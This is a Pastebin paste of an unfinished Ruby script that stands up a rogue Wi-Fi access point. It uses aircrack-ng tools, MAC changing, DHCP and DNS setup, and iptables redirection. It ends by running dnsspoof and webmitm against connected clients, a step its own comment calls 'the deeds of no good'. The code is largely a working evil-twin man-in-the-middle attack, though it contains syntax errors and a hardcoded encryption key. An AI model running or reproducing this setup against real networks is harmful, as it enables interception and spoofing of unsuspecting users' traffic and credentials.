API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 28th, 2017
113
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 7.56 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/ruby
  2. #capn-jack_mr_hai_signature_string
  3. # this is a work in progress, im going to eventuall make a complete handler for wireless router .
  4. # I started trying to make a WAP software in rub but after a while I started realizing that I shouldnt reinvent the wheel
  5. # i should just make a really good car. Im going to incorporate a bit of C and python also, the C to speed it up and the python
  6. #for some packet manipulation in the stream using scapy.
  7. #The configurtation options are all constants, i figured that instead of asking each time (since people generally have a
  8. #consistant setup) you set them in the code, the Class "packet_filter" is the filter (no really?!?!) i generally use nested ifs
  9. # for the hueristics but you can do whatever here
  10.  
  11. #install script
  12. #timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
  13. require 'socket'
  14. require 'openssl'
  15. #find alternatives to avahi and network manager
  16. #maybe make a WAP connection script?
  17. # iw? ifconfig? both !
  18. #airodump to showcase the area, iwconfig to connect
  19. #dhclient to get an IP
  20.  
  21.  
  22. #ACL from ruby doc
  23. # have it be invoked as a response to snort
  24. #
  25.  
  26. #general config
  27. KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
  28. IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
  29. $ACTBAD=true
  30. $VERBOSE = true
  31. LOGGING= true
  32. MONITOR="mon0"
  33. EXTIF="eth1"
  34. TUNNEL="at0"
  35. INTIF="wlan1"
  36. TTY="/dev/tty10"
  37. CHAN = "9"
  38. ESSID="Firefly"
  39. `alias wpas='sudo killall -9 wpa_supplicant'`
  40. `sudo killall -9 avahi-daemon `
  41. #DHCP config
  42. RANGE="192.168.1.2 192.168.1.254"
  43. SCOPE="192.168.1.0"
  44. GATEWAY="192.168.1.1"
  45. MASK="255.255.255.0"
  46. BROADCAST="192.168.1.255"
  47. DOMAIN="cerberusrouter.net"
  48. DNS1="208.67.222.222"
  49. DNS2="208.67.220.220"
  50.  
  51.  
  52.  
  53. #Handles encryption
  54. #example
  55. #   #preparing my balls for encryption
  56. #   balls = Encryption.new("balls")
  57. #   #encrypting my balls
  58. #   balls.encrypt_payload
  59. class Encryption
  60.     def initialize (string)
  61.         @string = string
  62.     end
  63.     #encrypts
  64.     def encrypt_payload
  65.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  66.         cipher.encrypt
  67.         cipher.key = WAPinit::KEY
  68.         cipher.iv = WAPinit::IV
  69.         cipher.update(@string) + cipher.final
  70.        
  71.     end
  72.     #decrypts
  73.     def decrypt_payload
  74.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  75.         cipher.decrypt
  76.         cipher.key = WAPinit::KEY
  77.         cipher.iv = WAPinit::IV
  78.         cipher.update(@string) + cipher.final
  79.     end
  80.    
  81. end
  82.  
  83. #this is a socket client to tx/rx streamimg data.
  84. class Socket_IO_cryptzz
  85.   def initialize(data, port, host)
  86.   @io_obj = data
  87.   @port = port
  88.   @host = host
  89.   end
  90.   def server
  91.     server = TCPServer.open(@port)
  92.     loop {                        
  93.       connection = server.accept
  94.       if connection.scan(::PREAMBLE)
  95.         encrypted_str = connection.gsub(::PREAMBLE , "")
  96.         decrypted_str = Encryption.new(encrypted_str)
  97.       data = Encryption.new(@io_obj)
  98.       crypt_data = data.encrypt_payload
  99.       connection.puts crypt_data      
  100.       connection.close
  101.     }
  102. end
  103.  
  104.  
  105. class Http_server
  106.   def initialize(port, header, max_connect, host,)
  107.     @host = host #(insert php server self here)
  108.   end
  109.  
  110. end
  111.  
  112.  
  113. #instances of this class start the show
  114. class WAPinit
  115. `/etc/init.d/networking restart`
  116. #file contents of the bind and DHCP servers and the interface file
  117. interfaces = <<INTERFACE
  118. #loopback interface
  119.     auto lo iface lo inet loopback
  120.  
  121.     # interface external network (internet), configured through dhcp
  122.     auto #{EXTIF}
  123.     iface #{EXTIF} inet dhcp
  124.  
  125.     #interface network 1
  126.     auto #{INTIF}
  127.     iface #{INTIF} inet static
  128.             address #{GATEWAWY}
  129.             netmask #{MASK}
  130.             network #{SCOPE}
  131.             broadcast #{BROADCAST}
  132.  
  133.  
  134.  
  135. INTERFACE
  136.  
  137. bind = <<BIND
  138. options {
  139.     directory "/var/cache/bind";
  140.    
  141.     forwarders {
  142.         #{GATEWAY};
  143.        
  144.     };
  145.  
  146.     auth-nxdomain no;    # conform to RFC1035
  147.     listen-on-v6 { any; };
  148. };
  149. BIND
  150.  
  151.  
  152. dhcp3 = <<DHCP
  153. ddns-update-style interim;                                  
  154. ignore client-updates;
  155.  
  156. subnet #{SCOPE} netmask #{MASK} {
  157.  
  158.         range #{RANGE};                  
  159.            option subnet-mask              #{MASK};    # Default subnet mask to be used by DHCP clients
  160.            option broadcast-address        #{BROADCAST};    # Default broadcast address to be used by DHCP clients
  161.            option routers                  #{GATEWAY};      # Default gateway to be used by DHCP clients
  162.            option domain-name              "#{DOMAIN}";
  163.            option domain-name-servers      #{DNS1}, #{DNS2};           # Default DNS to be used by DHCP clients
  164. }
  165. #         DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
  166. #       option ipforwarding off;
  167.  
  168.          default-lease-time 21600;                            # Amount of time in seconds that a client may keep the IP address
  169.         max-lease-time 43200;
  170.  
  171.         option time-offset              -18000;              # Eastern Standard Time
  172. #       option ntp-servers              192.168.1.1;         # Default NTP server to be used by DHCP clients
  173. DHCP
  174.  
  175. ifaces = File.open("/etc/network/interfaces", "w")
  176. ifaces.syswrite(interfaces)
  177. `route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
  178. `route add -net -n 0.0.0.0 dev #{EXTIF}`
  179. printf `route`
  180.  
  181. if `ifconfig`.match(/mon[0-9]/) = true
  182.  
  183.    elsif `ifconfig`.match(/at[0-9]/) = true
  184.  
  185.    elsif `ifconfig`.match(/wlan[0-9]/) = true
  186. #     `sudo killall -9 NetworkManager`
  187.      `sudo killall -9 avahi-daemon`
  188.      `killall -9 wpa_supplicant`
  189.      `airmon-ng start #{INTIF} #{CHAN}`
  190.      `gnome-terminal -e airodump-ng #{MONITOR}`
  191.      `changemac #{EXTIF}`
  192.      `changemac #{INTIF}`
  193.      `killall -9 wpa_supplicant`
  194.      pid = fork do
  195.        `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
  196.      end
  197.     Process.detach(pid)
  198.    else printf "Something happened with the interfaces, please configure your system and plug in any devices"
  199.   end
  200. sleep 4
  201. `ifconfig #{TUNNEL} up`
  202. #begin the router-fu!
  203. `modprobe ip_tables`
  204. `modprobe iptable_filter`
  205. `modprobe ip_conntrack`
  206. `modprobe ip_conntrack_ftp`
  207. `modprobe ip_conntrack_irc`
  208. `modprobe iptable_nat`
  209. `modprobe ip_nat_ftp`
  210. `modprobe ip_nat_irc`
  211. `echo "1" > /proc/sys/net/ipv4/ip_dynaddr`
  212. `iptables --table nat --flush`
  213. `iptables --delete-chain`
  214. `iptables --flush`
  215. `iptables -P INPUT ACCEPT`
  216. `iptables -F INPUT `
  217. `iptables -P OUTPUT ACCEPT`
  218. `iptables -F OUTPUT `
  219. `iptables -P FORWARD DROP`
  220. `iptables -F FORWARD `
  221. `iptables -t nat -F`
  222. `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
  223. `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
  224. `iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
  225. `iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
  226. `iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
  227. `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
  228. `iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`
  229. `echo "1" > /proc/sys/net/ipv4/ip_forward`
  230. `ifconfig at0 up`
  231. `ifconfig at0 #{GATEWAY} netmask #{MASK}`
  232. `ifconfig at0 mtu 1500`
  233. dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
  234. dhcpconf.syswrite(dhcp3)
  235. `dhcpd3 #{TUNNEL}`
  236. dnsf = File.open("/etc/bind/named.conf.options", "w")
  237. dnsf.syswrite(bind)
  238. printf `/etc/init.d/bind9 restart`
  239. `notify-send "#{ESSID} - Wireless Access Point initialized"`
  240. end
  241.  
  242. #Starting the server
  243. WAPinit.new
  244.  
  245. # so far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
  246. #tranparency and configuring the interfaces.
  247.  
  248. #now we begin the deeds of no good
  249.  
  250. `dnsspoof -i #{TUNNEL}`
  251. sleep 1
  252. `webmitm -d -d -d`
  253. sleep 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!